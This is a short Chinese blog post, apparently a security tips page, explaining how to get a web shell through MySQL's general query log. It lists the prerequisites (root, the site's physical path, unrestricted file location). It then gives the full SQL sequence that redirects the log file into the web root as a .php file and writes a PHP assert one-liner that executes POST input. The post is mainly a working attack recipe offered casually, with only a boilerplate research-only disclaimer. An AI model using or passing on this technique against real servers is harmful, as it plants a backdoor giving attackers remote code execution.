摘要
爽啊,Mysql日志拿shellemmm~只要root权限,网站路径和文件位置没被限制。SQL语句:set global general_log = on;set global general_log_file =。
正文
【摘要】Mysql通过日志拿shellemmm~有点舒服条件:1.root2.网站物理路径3.文件位置未被限制SQL语句:set…
Mysql通过日志拿shell
emmm~有点舒服
条件:
1.root
2.网站物理路径
3.文件位置未被限制
SQL语句:set global general_log = on;set global general_log_file = ‘C:/phpStudy/WWW/dyboy.php’;select ‘<?php @assert($_POST[“dyboy”]); ?>’;set global general_log = off;
关注不迷路
扫码下方二维码,关注宇凡盒子公众号,免费获取最新技术内幕!
温馨提示:如果您访问和下载本站资源,表示您已同意只将下载文件用于研究、学习而非其他用途。
评论0